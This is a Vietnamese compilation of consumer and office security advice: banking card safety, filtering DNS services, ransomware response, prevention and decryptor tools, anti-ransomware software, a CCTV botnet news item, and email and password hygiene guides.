  8. Riêng thẻ Visa Master Amex, người dùng cần che luôn cả số CVV, CSC đằng sau, tuyệt đối không cho ai cầm thẻ của mình, hạn chế tính năng dùng thẻ phụ.
  9. Đối với các ứng dụng của ngân hàng, nếu buộc phải sử dụng, người dùng chỉ được phép tải về từ các chợ ứng dụng chính thống như Google CH Play, Apple iTunes. Tuyệt đối không được tải ứng dụng ngân hàng từ các nguồn lạ, các máy cài đặt ứng dụng ngân hàng nên là các máy không jailbreak (đối với iOS), hoặc chưa root (đối với Android).
  10.  Và cuối cùng, máy tính dùng để đăng nhập vào Internet Banking phải là máy “sạch”, an toàn, không dùng máy lạ để đăng nhập tài khoản, máy tính có cài antivirus để hạn chế virus, phishing,nên sử dụng DNS securitysử dụng email an toàn.

6 dịch vụ DNS security bảo vệ bạn trước malware và các nội dung độc hại

DNS servers đứng giữa browser và nội dung website, có nhiều dịch vụ DNS của bên thứ ba có các chức năng bổ sung cho cả người dùng và administrators tăng cường bảo mật cho máy tính, các tính năng này bao gồm có:
– Lọc nội dung: trên dns servers có thể triển khai chặn các nội dung site người lớn hoặc các nội dung không mong muốn
– Block malware và phishing: Tính năng này dựa vào việc lọc nội dung ở trên, có thể block các website chứa mã độc, các website lừa đảo hoặc các nội dung nguy hiểm khác.
– Chặn quảng cáo: Đây là 1 dạng khác của lọc nội dung, một số dịch vụ dns có thể triển khai chặn quảng cáo
– Sửa lỗi khi gõ url: Ví dụ khi bạn gõ gogle.com , nó sẽ sửa lại cho đúng thành google.com

Dưới đây là 6 dịch vụ DNS sẽ giúp bạn tăng cường an toàn bảo mật khi sử dụng:

1. Comodo Secure DNS: 

Website:  https://www.comodo.com/secure-dns/

Miễn phí cho:  Người dùng cá nhân sử dụng
Địa chỉ DNS:  8.26.56.26 và 8.20.247.20

Comodo Secure DNS đưa ra một dịch vụ miễn phí, đơn giản cho người dùng cá nhân sử dụng. Dịch vụ này sẽ được cấu hình sẵn để chặn các website có hại như chứa malware, spyware và phishing lừa đảo. Thêm nữa, theo comodo thì dịch vụ của họ có độ tin cậy cao, nhanh hơn và thông minh hơn nhiều dịch vụ DNS được cung cấp bởi hầu hết các ISP.

comodo-blocked

Comodo Secure DNS

Khi 1 website bị blocked bởi Comodo Secure DNS, một trang cảnh báo sẽ hiện ra, hiện thị lý do tại sao trang web này bị blocked và cho phép người dùng chọn lựa không truy cập hoặc tiếp tục truy cập bằng cách chọn Continue anyway.
Trong trường hợp tên miền không tồn tại hoặc không truy cập được, người dùng sẽ nhìn thấy một trang được gọi là Comodo Secure DNS Search. Một số gợi ý hoặc từ khóa sẽ được hiển thị dựa trên tên miền mà họ đang muốn truy cập.Các kết quả search được cung cấp bởi công cụ tìm kiếm Yahoo

2. Dyn Internet Guide:

Website: http://dyn.com/labs/dyn-internet-guide/

Miễn phí cho: Người dùng cá nhân hoặc doanh nghiệp sử dụng
Địa chỉ DNS: 216.146.35.35 và 216.146.36.36

dyn-internet-guide-blocked

Dyn Internet Guide

Dyn Internet Guide là dịch vụ miễn phí cho các cá nhân tổ chức sử dụng, nó được cấu hình sẵn chặn malware, phishing site và lỗi gõ sai địa chỉ.

Dyn cũng cung cấp các dịch vụ khác như lọc nội dung, dyndns hostnames cho truy cập từ xa và full giải pháp DNS cho websites

3. FoolDNS:

Website: http://www.fooldns.com/fooldns-community/english-version/

Miễn phí cho: Người dùng cá nhân hoặc doanh nghiệp sử dụng
Địa chỉ DNS: 87.118.111.215 and 213.187.11.62
FoolDNS cung cấp cả dịch vụ miễn phí lẫn trả phí, hướng đến người dùng gia đình và doanh nghiệp nhỏ. Dịch vụ được thiết kế để chặn các theo dõi trực truyến, quảng cáo và chặn cả malware và các website phishing.
Dịch vụ trả phí bao gồm các chức năng bổ sung như báo cáo, logging, tạo whitelist, blacklist.

Fool dns simple

Fool dns

Khi một trang web bị block, ví dụ nếu website chứa malware, một trang đơn giản sẽ hiện ra , thông báo tên miền này đã bị filtered.
Khi người dùng truy cập các trang không tồn tại hoặc không truy cập được tên miền, người dùng sẽ thấy trang báo lỗi mặc định của browser.

4. GreenTeam Internet:

Website: http://members.greentm.co.uk

Miễn phí cho: Người dùng cá nhân hoặc doanh nghiệp sử dụng
Địa chỉ DNS: 81.218.119.11 and 209.88.198.133

GreenTeam Internet cung cấp cả dịch vụ miễn phí và trả phí cho cá nhân và doanh nghiệp nhỏ. Dịch vụ miễn phí được cung cấp tự động chức năng chặn các site chưa malware, các site phishing, quản cáo và các site có nội dung người lớn bao gồm cả các site có nội dung bảo lực hoặc liên quan ma túy..

Greenteam Internet

Greenteam Internet

Khi một site bị block, người dùng sẽ được cảnh báo, trên trang cảnh báo, người dùng có thể gửi email cho GreenTeam để yêu cầu unblock. Người dùng có thể điền email của mình vào để nhận cảnh báo nếu website được unblock.
Sử dụng tài khoản miễn phí hoặc trả phí, quản trị hệ thống có thể chỉnh sửa lại thông báo trên trang cảnh báo cho phù hợp.
Khi người dùng truy cập các trang không tồn tại hoặc không truy cập được tên miền, người dùng sẽ thấy trang báo lỗi mặc định của browser.

5. Norton ConnectSafe:

Website: https://dns.norton.com/

Miễn phí cho: Người dùng cá nhân sử dụng

Địa chỉ DNS: Dựa vào mục đích sử dụng

  • A – Security (malware, phishing sites and scam sites)
    Preferred DNS: 199.85.126.10
    Alternate DNS: 199.85.127.10
  • B – Security + Pornography
    Preferred DNS: 199.85.126.20
    Alternate DNS: 199.85.127.20
  • C – Security + Pornography + Other
    Preferred DNS: 199.85.126.30
    Alternate DNS: 199.85.127.30
Norton ConnectSafe

Norton ConnectSafe

Khi người dùng truy cập một website bị blocked, họ sẽ thấy trang cảnh báo và lý do website bị block. Khi trang web không tồn tại hoặc không truy cập được thì tên miền sẽ không hiện quảng cáo nhưng sẽ gợi ý các từ khóa tìm kiếm được cung cấp bởi ask.com

6. OpenDNS:

Website: https://www.opendns.com/
Miễn phí cho: Cá nhân doanh nghiệp sử dụng DNS nâng cao, cá nhân chỉ sử dụng cho các dịch vụ gia đình.
Địa chỉ DNS: 208.67.222.222 và 208.67.220.220 (“FamilyShield” DNS addresses: 208.67.222.123 và 208.67.220.123)

OpenDNS là một trong những nhà cung cấp DNS nổi tiếng , cung cấp các dịch vụ cả miễn phí và có phí cho cá nhân và doanh nghiệp. Dịch vụ cơ bản miễn phí được gọi là Enhanced DNS, cung cấp DNS được cấu hình chặn malware và phishing site.

OpenDNS

OpenDNS

OpenDNS cũng cung cấp các dịch vụ khác như:
OpenDNS FamilyShield: Giống như Enhanced DNS, được cấu hình chặn thêm các site có nội dung người lớn
OpenDNS Home: Giống như Enhanced DNS, ngoài ra người dùng có thể chỉnh sửa cấu hình lọc và bảo mật , bao gồm chỉnh sửa whitelist, blacklist, chỉnh sửa thông báo cho trang block và logs cơ bản, thống kê statistics.
OpenDNS Home VIP: Giống Home với thống kê sử dụng kèm dịch vụ support (yêu cầu cần tạo tài khoản)

Khi một trang bị block, người dùng sẽ nhìn thấy một trang đơn giản thông báo trang web bị block kèm lý do bị block. Quả trị viên có thể sử dụng tài khoản miễn phí hoặc trả phí để thêm các ghi chú và có thể liên lạc để yêu cầu gỡ bỏ block.
Khi người dùng truy cập các trang không tồn tại hoặc không truy cập được tên miền, người dùng sẽ thấy trang báo lỗi mặc định của browser.

Xử lý khi máy tính bị nhiễm mã độc mã hóa dữ liệu (Ransomware)

Nhiễm mã độc mã hóa dữ liệu ransomware là tình huống sự cố rất nghiêm trọng.Nếu máy tính bạn bị nhiễm ransomware, xin chia buồn cùng bạn.
Sau đây là những việc bạn cần làm ngay để xử lý tình huống nhiễm ransomware:

  1.  Nếu máy tính bị nhiễm được kết nối trong mạng LAN, hãy nhanh chóng ngắt kết nối mạng của máy tính. Nếu máy tính còn được kết nối đến các thiết bị/vùng lưu trữ khác như External HDD, NAS, SAN thì cũng ngay lập tức ngắt các kết nối này. Nhanh chóng shutdown máy tính. Nếu chức năng shutdown của hệ điều hành Windows đã bị khóa, tắt máy bằng cách ngắt nguồn điện. Mục đích nhằm ngăn chặn lây lan, khiến hậu quả thêm trầm trọng.
  2.  Khởi động máy tính từ hệ điều hành sạch (từ ổ đĩa CD/DVD hoặc USB) hoặc tháo ổ cứng để kết nối vào máy tính sạch khác. Thực hiện kiểm tra các tập tin dữ liệu và sao lưu các dữ liệu chưa bị mã hóa;
    Nên sao lưu cả các file đã bị mã hóa ra thiết bị lưu trữ khác để sau này có thể cần dùng đến. Có thể một thời gian sau sẽ có được công cụ giải mã loại ransomware bạn nhiễm. Hoặc chính tác giả ransomware quyết định cung cấp khóa giải mã cho ransomware mình phát tán (đã từng có trường hợp như vậy).
  3. Nếu máy tính có bật Volume Shadow Copy trước đó, bạn thử khôi phục lại các mốc thời điểm tạo VSS xem có kết quả không.
  4. Nếu bạn có bản backup và dự định phục hồi lại dữ liệu, hãy format, cài đặt lại Windows và dùng các phần mềm Anti-virus, Anti-ransomware quét kỹ để đảm bảo máy không còn ransomware. Sau đó hãy tiến hành phục hồi dữ liệu.
  5. Khởi động vào chế độ Safe Mode của Windows, sử dụng các chương trình Anti-ransomware với cập nhật mới nhất và quét ở chế độ Deep-scan để hy vọng tiêu diệt được ransomware ra khỏi máy tính.
  6. Nhận diện ransomware đang bị nhiễm. Một số ransomware tự cung cấp thông tin về nó, nhưng nhiều ransomware khác thì không. Lúc này, bạn cần sử dụng công cụ ID Ransomware để giúp nhận diện.
  7. Sau khi biết được loại ransomware, bạn tìm kiếm công cụ giải mã dữ liệu, hy vọng danh sách các Decryptor Tool  này có ransomware bạn bị nhiễm. Các công cụ decryptor được cập nhật liên tục bởi các hãng bảo mật lớn nên nếu không tìm thấy từ danh sách ở bài viết trên, bạn nên tìm kiếm thêm từ Google với từ khóa là ransomware bạn bị nhiễm.  Thử khôi phục các file bị ảnh hưởng từ Windows:

    Các tập tin dữ liệu đã bị mã hóa hầu như không thể giải mã được. Nhưng trong 1 số trường hợp, có thể sử dụng các phần mềm khôi phục dữ liệu (ShadowExplorer,getdataback,7 data recovery,recuva,FTK, EaseUs, R-STUDIO) để khôi phục các tập tin nguyên bản đã bị xóa.

  8. Nếu ransomware ngăn chặn không cho phép bạn truy cập Windows, hoặc bạn có thể truy cập Windows nhưng không thực hiện được những thao tác quan trọng, sử dụng công cụ WindowsUnlocker của Kaspersky để xóa ransomware tác động vào Registry và giành lại quyền truy cập Windows.
  9. Nếu đã thử mọi bước trên mà vẫn không hiệu quả, bạn chỉ còn 2 lựa chọn: Trả tiền chuộc hoặc Mất dữ liệu. Nếu dữ liệu thật sự quan trọng và số tiền chuộc không quá nhiều, bạn có thể cân nhắc phương án này (thường ở mức vài trăm USD, sau đó tăng lên ~1.000 USD nếu bạn nộp chuộc trễ hơn deadline). Nhưng một tình huống có thể xảy ra là dù bạn trả tiền chuộc thì vẫn KHÔNG giải mã được dữ liệu. Chưa kể việc liên hệ và thanh toán tiền chuộc không phải lúc nào cũng thành công (đa phần thanh toán bằng Bitcoin và quá trình mua loại tiền này khá phức tạp).
  10. Bạn cần rút ra bài học và tìm cách ngăn chặn sự cố này tiếp diễn: sao lưu dữ liệu thường xuyên, lưu trữ dữ liệu sao lưu tách biệt trong thời gian đủ lâu, đào tạo end-user về cách tránh lây nhiễm ransomware, cập nhật HĐH và các phần mềm Anti-virus, Anti-ransomware,… Tham khảo thêm Hướng dẫn phòng tránh mã độc mã hóa dữ liệu Ransomware

Hướng dẫn phòng tránh mã độc mã hóa dữ liệu (Ransomware)

Hai phương pháp lây lan chủ yếu của virus mã hóa dữ liệu đòi tiền chuộc là:
gửi tệp tin nhiễm mã độc kèm theo thư điện tử, khi người sử dụng kích hoạt tệp tin đính kèm thư điện tử sẽ làm lây nhiễm mã độc vào máy tính;
gửi thư điện tử hoặc tin nhắn điện tử có chứa đường dẫn đến phần mềm bị giả mạo bởi mã độc Ransomware và đánh lừa người sử dụng truy cập vào đường dẫn này để vô ý tự cài đặt mã độc lên máy tính.
Ngoài ra, máy tính còn có thể bị nhiễm thông qua các con đường khác như lây lan qua các thiết bị lưu trữ, lây qua cài đặt phần mềm, sao chép dữ liệu, phần mềm…
Những lưu ý dưới đây có thể giúp bạn phòng tránh khả năng bị lây nhiễm mã độc mã hóa dữ liệu ransomware:
1. Đào tạo end-user
Đa phần các tình huống nhiễm ransomware đều xuất phát từ end-user.Vì thế, bạn nên sớm cảnh báo end-user trong công ty về việc:

  • Không mở các email gửi đến từ những email chưa rõ danh tính, có dấu hiệu khả nghi (nếu mở thì không click vào các link, Không mở các file đính kèm). Xem thêm Hướng dẫn sử dụng email an toàn 
  • Không click các link lạ được gửi qua Skype, Yahoo Messenger, Facebook,…
  • Không truy cập các website lạ, không click các banner quảng cáo không biết chắc
  • Nếu phát hiện các email, link khả nghi nên báo liền cho bộ phận IT để kịp thời cảnh báo end-user khác và có các biện pháp ngăn chặn phù hợp

Nếu có thể đảm bảo end-user tuân thủ các lưu ý trên thì bạn đã giảm được phần lớn khả năng lây nhiễm ransomware.

2. Luôn đảm bảo hệ điều hành, phần mềm, các ứng dụng và phần mềm diệt virus được cập nhật thường xuyên
Ransomware sẽ càng dễ xâm nhập khi Windows không được cập nhật các bản vá lỗi, các phần mềm Anti-virus không được cập nhật các signature mới nhất. Các phần mềm bảo mật khi được cập nhật sẽ có khả năng nhận biết các ransomware mới và nhờ đó giúp ngăn chặn khi bạn có ý định chạy một file (có chứa ransomware trong đó).

Ngoài ra, bạn cũng cần cập nhật các phần mềm Web-browser, Mail client vì bản cập nhật mới có thể bổ sung các tính năng bảo mật giúp bạn an toàn khi truy cập web, nhận email.
3. Sao lưu dữ liệu và bảo vệ dữ liệu bằng các thiết bị rời.

Cách tốt nhất để đảm bảo sự an toàn của dữ liệu quan trọng là có một lịch trình sao lưu phù hợp. Sao lưu phải được thực hiện thường xuyên và hơn thế nữa bản sao cần phải được tạo ra trên một thiết bị lưu trữ chỉ có thể truy cập trong quá trình sao lưu. Tức là một thiết bị lưu trữ di động ngắt kết nối ngay lập tức sau khi sao lưu. Việc không tuân thủ các khuyến nghị này sẽ dẫn đến các tập tin sao lưu cũng sẽ bị tấn công và mã hóa bằng các phần mềm tống tiền theo cách tương tự như trên các phiên bản tập tin gốc.Sao lưu dữ liệu vẫn là cách phòng chống hữu hiệu nhất với bất kỳ loại ransomware nào. Bên cạnh đó bạn cũng cần phải trang bị thêm cho máy tính một phần mềm bảo vệ và chống mã độc tốt như Avast!, AVG.. hay cao cấp hơn như Norton, Kaspersky.

4. Cấu hình hạn chế truy cập đến các thư mục chia sẻ trong mạng.
5. Bật tính năng System Protection (System Restore) cho tất cả các ổ đĩa.

Hãy tập cho mình có thói quen cảnh giác với các tập tin được chia sẻ ở các nguồn cung cấp hay người dùng không an toàn và “chính chủ”.

Tổng hợp các công cụ giúp giải mã dữ liệu bị mã hóa bởi ransomware

Nếu máy tính bạn bị nhiễm ransomware, xin chia buồn cùng bạn. Các tập tin dữ liệu đã bị mã hóa hầu như không thể giải mã được. Nhưng ít ra những thông tin cung cấp trong bài viết có thể giúp ích cho bạn. Việc còn lại là trông chờ vào may mắn.

Trước khi tìm hướng xử lý, bạn cần biết máy tính của mình đang nhiễm ransomware gì. Trang web ID Ransomware có thể giúp bạn thực hiện điều này.
Danh sách bên dưới là tổng hợp các Decryptor Tool có thể giúp bạn giải mã dữ liệu bị mã hóa bởi ransomware .

  1. CoinVault, Bitcryptor, CryptXXX: Công cụ Ransoware Decryptor của Kaspersky có thể giúp bạn giải mã dữ liệu bị mã hóa bởi 3 ransomware CoinVault, Bitcryptor và CryptXXX. Bạn tìm hiểu về công cụ này tại link https://noransom.kaspersky.com.
  2. Rector, Rannoh, Rakhni, Scatter, Xorist, Scraper: Ngoài 3 ransomware trên, Kaspersky còn cung cấp nhiều Decyptor Tool khác giúp giải mã các ransomware: Rector, Rannoh, Rakhni, Scatter, Xorist, Scraper. Bạn download tại đây: http://support.kaspersky.com/viruses/utility.
  3. Autolocky: Emisoft cung cấp công cụ Decypter cho ransomware Autolocky tại link https://decrypter.emsisoft.com/autolocky. Autolocky là một biến thể của Locky nhưng không phức tạp bằng. Hiện Emisoft đã có thể giải mã. Khi bị nhiễm Autolocky, file sẽ bị mã hóa và đổi tên thành đuôi *.locky.
  4. PETYA: Ransomware này khá hiểm độc. Nó ghi đè Master Boot Record (MBR) khiến máy tính không thể khởi động (kể cả ở chế độ Safe Mode). Hiện đã có công cụ Petya Ransomware Decrypt Tool & Password Generator giúp bạn có thể giành lại quyền truy cập máy tính. Tuy nhiên, các bước tiến hành tương đối phức tạp; bạn nên tham khảo cách tiến hành tại đây: http://www.thewindowsclub.com/petya-ransomware-decrypt-tool-password-generator.
  5. Operation Global III: Ransomware này mã hóa dữ liệu của bạn và đổi tên file thành .EXE. Không những vậy, nó còn chèn đoạn mã độc vào file với mục đích lây lan sang các máy khác. Bạn tham khảo bài viết về hoạt động và cách khắc phục ransomware này tại link http://www.bleepingcomputer.com/forums/t/559220/operation-global-iii-ransomware-not-only-encrypts-but-infects-your-data-as-well.
  6. Nemucod, DMALocker2, HydraCrypt, DMALocker, CrypBoss, Gomasom, LeChiffre, KeyBTC, Radamant, CryptInfinite, PClock, CryptoDefense, Harasom: Ngoài công cụ giải mã cho Autolocky (trình bày ở mục 3), Emisoft còn cung cấp công cụ giải mã cho tất cả các ransomware trên. Bạn có thể download tại đây: https://decrypter.emsisoft.com.
    Nemucod mã hóa và đổi tên file thành *.crypted. Ngoài ra, bạn còn thấy xuất hiện file DECRYPT.txt trên Desktop.
    DMALocker2 mã hóa nhưng không đổi tên file. Ransomware này tự cung cấp thông tin mình là DMALocker2 với ID là “DMALOCK 43:41:90:35:25:13:61:92”
    HydraCrypt mã hóa và đổi tên file thành *.hydracrypt* hoặc *.umbrecrypt*
    DMALocker tương tự DMALocker2. Nhưng có ID là “DMALOCK 41:55:16:13:51:76:67:99”
    CrypBoss mã hóa và đổi tên file thành *.crypt hoặc *.R16M01D05. Đồng thời còn yêu cầu bạn gửi mail về địa chỉ mail có dạng @dr.com
    Gomasom mã hóa và đổi tên file thành *.crypt. Trong tên file có địa chỉ email để liên hệ
    LeChiffre mã hóa và đổi tên file thành *.LeChiffre. Đồng thời yêu cầu bạn liên hệ qua địa chỉ email decrypt.my.files@gmail.com
    KeyBTC tạo ra file DECRYPT_YOUR_FILES.txt và yêu cầu bạn liên hệ keybtc@inbox.com
    Radamant mã hóa và đổi tên file thành *.rdm hoặc *.rrk
    CryptInfinite mã hóa và đổi tên file thành *.CRINF
    PClock mã hóa nhưng không đổi tên file. Ransomware này tự nhận mình là CryptoLocker; đồng thời tạo ra file enc_files.txt trong thư mục User Profile của bạn.
    CryptoDefense tự cung cấp thông tin mình là CryptoDefense và tạo ra file HOW_DECRYPT.txt
    Harasom mã hóa và biến tất cả file thành đuôi *.html. Ransome note cho biết nó là Spamhaus hoặc US Department of Justice
  7. Tesla: Cisco cung cấp công cụ dòng lệnh TeslaCrypt Decryption Tool giúp bạn giải mã dữ liệu bị mã hóa bởi ransomware Tesla. Bạn tìm hiểu về công cụ này tại đây: http://blogs.cisco.com/security/talos/teslacrypt.
  8. Decrypt Protect: Ransomware này cũng được giải mã bởi Emisoft. Bạn download công cụ tại đây: http://tmp.emsisoft.com/fw/decrypt_mblblock.exe.
  9. TorrentLocker, Alpha Crypt, TeslaCrypt: Bạn tham khảo cách giải mã 3 loại ransomware này tại link: http://www.bleepingcomputer.com/virus-removal/threat/ransomware.

5 phần mềm Anti-ransomware miễn phí

Hầu hết các phần mềm Anti-virus đều trang bị kèm tính năng chống ransomware. Tuy nhiên, do ransomware hoạt động với cơ chế tương đối khác các malware thông thường nên có thể nhiều phần mềm Anti-virus không phát hiện ra được ransomware.

Dưới đây là 5 phần mềm Anti-ransomware miễn phí nhỏ gọn có thể giúp ích cho bạn phòng chống ransomware:

1. Malwarebytes Anti-Ransomware

malwarebytes-anti-ransomware

Malwarebytes Anti-Ransomware là phần mềm có nguồn gốc từ CryptoMonitor của EasySync Solutions. Không hoạt động theo cơ chế signature như các phần mềm Anti-malware thông thường, Malwarebytes Anti-Ransomware hoạt động theo cơ chế behaviour – nó theo dõi hoạt động của file và ngay lập tức ngừng máy tính khi phát hiện thấy có dấu hiệu hoạt động của ransomware.

Với cơ chế behaviour, Malwarebytes Anti-Ransomware không chỉ ngăn chặn các ransomware đã có như CryptoLocker, CryptoWall, or CTB-Locker mà còn có thể ngăn chặn các ransomware mới chưa từng biết đến (vì các ransomware đều có behaviour tương tự nhau).

Hiện Malwarebytes Anti-Ransomware đang ở phiên bản BETA và được cung cấp miễn phí. Bạn tìm hiểu thêm và download tại https://blog.malwarebytes.org/malwarebytes-news/2016/01/introducing-the-malwarebytes-anti-ransomware-beta.

Nếu muốn sử dụng CryptoMonitor (một phiên bản trước của Malwarebytes Anti-Ransomware), bạn download tại link http://download.cnet.com/CryptoMonitor/3000-2239_4-76370986.html.

2. BitDefender Anti-Ransomware

bitdefender-anti-ransomware
Phần mềm Anti-ransomware của hãng bảo mật nổi tiếng BitDefender hoạt động theo cơ chế: Nó ngăn chặn không cho chạy các file thực thi tại 2 thư mục %appdata% và %startup%.

Bạn tìm hiểu và download công cụ này tại https://labs.bitdefender.com/2016/03/combination-crypto-ransomware-vaccine-released.

3. Trend Micro AntiRansomware Tool

trend-micro-anti-ransomware
Trend Micro AntiRansomware Tool là phần mềm giúp phát hiện và loại bỏ ransomware ra khỏi máy tính bị nhiễm. Để sử dụng phần mềm này, bạn phải download và cài đặt ở chế độ Safe mode with Networking của Windows. Sau khi cài đặt phần mềm, bạn khởi động Windows ở chế độ bình thường. Lúc này, có thể màn hình Windows đã bị khóa bởi ransomware. Do đó, để chạy AntiRansomeware Tool, bạn nhấn tổ hợp phím CTRL (left) + ALT + T + I. Chạy Scan, Clean rồi khởi động lại máy.

Bạn download version 2.0 tại link http://esupport.trendmicro.com/solution/en-us/1097042.aspx?name=using%20trend%20micro%20antiransomware%20tool. Hoặc có thể dùng version 3.0 bằng USB tại link https://esupport.trendmicro.com/en-us/home/pages/technical-support/1098354.aspx.
4. CryptoPrevent

crypto-prevent
Cơ chế bảo vệ của CryptoPrevent là điều chỉnh các thiếp lập của Group Policy nhằm ngăn chặn chạy các file thực thi tại một số thư mục như: Recycle Bin, thư mục mặc định AppData, thư mục Temporary, thư mục AppData và Local Data Settings của các user,… Vì ransomware thường trú ngụ trong các thư mục này trước khi thực thi để phá hoại nên việc ngăn chặn file thực thi từ các thư mục ngày có thể ngăn không cho ransomware hoạt động.

CryptoPrevent cũng cung cấp danh sách Whitelist để bạn cho phép các ứng dụng mà bạn chắc chắn tin cậy thực thi từ các thư mục được CryptoPrevent bảo vệ.

CryptoPrevent có cả bản Free lẫn Commercial. Bạn có thể download tại link https://www.foolishit.com/cryptoprevent-malware-prevention.

5. Kaspersky WindowsUnlocker

kaspersky-windows-unlocker
WindowsUnlocker của Kaspersky là phần mềm giúp bạn giành lại quyền điều khiển Windows khi bị khóa bởi ransomeware. Một số loại ransomware làm thay đổi Registry và các file hệ thống của Windows, khiến bạn không thể truy cập Windows hoặc có thể truy cập nhưng không thể thực hiện các thao tác quan trọng. Trong tình huống này, bạn download file ISO của WindowsUnlocker và ghi vào đĩa CD/DVD hoặc USB để tạo Kaspersky Rescue Disk. Boot từ Rescue Disk này và chạy Kaspersky WindowsUnlocker để phần mềm xử lý ransomware trong Registry và các file hệ thống để giành lại quyền điều khiển cho bạn.

Bạn download phần mềm và xem hướng dẫn tại link http://support.kaspersky.com/viruses/disinfection/8005#block2.

IoT Botnet – 25,000 CCTV Cameras đã bị hack và được sử dụng để tấn công DDoS

Các thiết bị kết nối internet (Internet of things – IoTs) ngày càng gia tăng với số lượng lớn đồng thời kéo theo nhiều mối đe dọa hơn về bảo mật.

Và nay…
Các thiết bị CCTV camera trở thành công cụ botnets để thực hiện tấn công từ chối dịch vụ (DDoS) vào lượng lớn website trên Internet.

cctv-camera-hacking

Các chuyên gia bảo mật tại Sucuri đã nhận thấy trên 25000 thiết bị CCTV camera trên toàn cầu đang bị lợi dụng để tham gia tấn công DDoS vào các website nhỏ về buôn bán trang sức.
Các website này bị tấn công khoảng 35,000 HTTP request trên giây dẫn đến tình trạng từ chối dịch vụ.
Khi các website này hoạt động trở lại thì lượng botnet tiếp tục gia tăng số lượng các request lên đến 50,000 request trên giây.
Trong khi điều tra tấn công, các chuyên gia bảo mật phát hiện ra nguồn gốc tấn công xuất phát từ các thiết bị CCTV Camera đã bị kiểm soát bởi hacker.
Số lượng thiết bị CCTV huy động tham gia tấn công trong lần này đến từ khoảng 105 quốc gia trên toàn thế giới, trong đó nhiều nhất đến từ Đài Loan 24%. Các chuyên gia tại Sucuri ước tính tổng cộng có 25,513 địa chỉ IP tham gia trong vòng vài giờ, trong số đó có cả IPv6.
Dường như các CCTV camera này bị hack thông qua lỗ hổng RCE của CCTV-DVR

Thông tin chi tiết xem tại: https://blog.sucuri.net/2016/06/large-cctv-botnet-leveraged-ddos-attacks.html

Hướng dẫn sử dụng an toàn hòm thư điện tử (email)

Hướng dẫn sử dụng an toàn hòm thư điện tử(email)

keep-your-email-safe
– Hạn chế tốia việc truy cập hòm thư điện tử bằng máy tính không đảm bảo an toàn hoặc mạng máy tính không an toàn.
– Hạn chế tối đa việc sử dụng máy tính cá nhân truy cập hòm thư điện tử thông qua mạng Internet không an toàn như: truy cập mạng Internet thông qua điểm truy cập không dây tại quán ăn, giải khát, không rõ nguồn gốc v.v…
– Không sử dụng hòm thư điện tử do cơ quan cấp cho mục đích cá nhân như: đăng ký dịch vụ thương mại, dịch vụ trao đổi chia sẻ thông tin cá nhân.
– Hạn chế sử dụng ứng dụng duyệt thư điện tử có sẵn trên các thiết bị di động như Smart phone hoặc máy tính bảng để truy cập vào hòm thư điện tử được cấp.
– Chú ý cảnh giác với những thư điện tử có nội dung, nguồn gốc khả nghi
– Đánh dấu Spam ngay khi nhận được các thư rác.
– Khi nhận được thư điện tử gửi kèm tệp tin mà không phát hiện ra nghi ngờ thì thực hiện các bước sau:
1) Tải tệp tin về ổ cứng (tuyệt đối không mở hoặc kích hoạt tệp tin ngay);
2) Dùng phần mềm diệt mã độc quét, kiểm tra tệp tin vừa tải về (nếu cần có thể liên lạc lại với người gửi thư để xác nhận tệp tin đã nhận được). Chỉ mở tệp tin nếu không phát hiện ra mã độc;
3) Nếu phát hiện ra mã độc, gửi thư điện tử đó dưới dạng file đính kèm cho quản trị hệ thống để xử lý.
– Không gửi, nhận tệp tin thực thi qua hệ thống thư điện tử và hạn chế việc dùng tệp tin nén có mã hóa.
– Khuyến khích sử dụng chữ ký số để ký xác nhận trên thư điện tử gửi đi và kiểm tra nguồn gốc thư điện tử khi tiếp nhận bằng chữ ký số nếu thư đó đã được ký bằng chữ ký số của người gửi.
– Xóa thư khi không còn cần thiết để tránh bị mất mát thông tin nếu tài khoản bị lộ.
– Sử dụng và quản lý mật khẩu theo hướng dẫn sử dụng mật khẩu an toàn.

Hướng dẫn đặt và sử dụng mật khẩu an toàn

  1. Đặt mật khẩu
    Người sử dụng cần chú ý các nguyên tắc đặt mật khẩu sau đây để hạn chế khả năng lộ mật khẩu do bị đoán nhận hoặc tấn công dò mật khẩu:
    – Mật khẩu khó đoán (Mật khẩu cần bao gồm: chữ hoa, chữ thường trong bảng chữ cái, số và các ký tự đặc biệt).
    – Tự tạo riêng quy tắc đặt mật khẩu sao cho vừa dễ nhớ và bí mật. Không nên dùng một số thông tin dễ bị đoán nhận để đặt mật khẩu.
    – Có độ dài tối thiểu 8 ký tự và phù hợp với tính chất bí mật của từng loại tài khoản khác nhau.
    – Không sử dụng cùng một mật khẩu cho nhiều tài khoản.username-and-password
  2. Sử dụng mật khẩu
    Một số chú ý trong quá trình sử dụng mật khẩu an toàn, hạn chế rủi ro lộ mật khẩu do phần mềm mã độc, sơ xuất trong quá trình sử dụng:
    – Trước khi nhập mật khẩu, chú ý kiểm tra và tắt tất cả các chế độ cho phép lưu mật khẩu.
    – Cần chú ý thoát khỏi tài khoản trước khi kết thúc công việc hoặc chuyển giao máy tính cho người khác sử dụng.
    – Hạn chế tiết lộ, chia sẻ mật khẩu cho người khác.
    – Dùng ứng dụng bàn phím ảo của hệ điều hành đăng nhập (Dùng chuột bấm chữ cái trên bàn phím ảo thay cho gõ chữ cái trên bàn phím) để tránh các phần mềm keylogger
    trên các máy tính không an toàn.
  3. Quản lý mật khẩu an toàn:
    Sử dụng các nguyên tắc sau để quản lý mật khẩu an toàn:
    – Cân nhắc sử dụng phần mềm hỗ trợ quản lý tài khoản để đăng nhập.
    – Không lưu mật khẩu vào các tập tin văn bản không có biện pháp bảo vệ phù hợp.
    – Thay đổi mật khẩu định kỳ, tối thiểu 6 tháng một lần.
    – Đối với trường hợp bị mất mật khẩu phải thay mật khẩu ngay và thông báo cho quản trị hệ thống.
    – Đối với trường hợp nghỉ công tác, quản trị hệ thống phải xóa hoặc khóa tài khoản người dùng đó khi không có nhu cầu sử dụng.

Cửa hàng online của Acer để lộ dữ liệu khách hàng

Nhà sản xuất máy tính Acer gần đây vừa tiết lộ với Phòng tư pháp bang California rằng hacker đã đột nhập vào cửa hàng online của hãng và lấy cắp thông tin nhạy cảm của khách hàng. Dữ liệu bị lộ lọt gồm các thông tin khách hàng, địa chỉ, số thẻ tín dụng gồm cả ngày hết hạn và mã số an ninh (mã CVC). Vụ hack đã ảnh hưởng tới 34.500 khách hàng ở Mỹ, Canada, Puerto Rico.
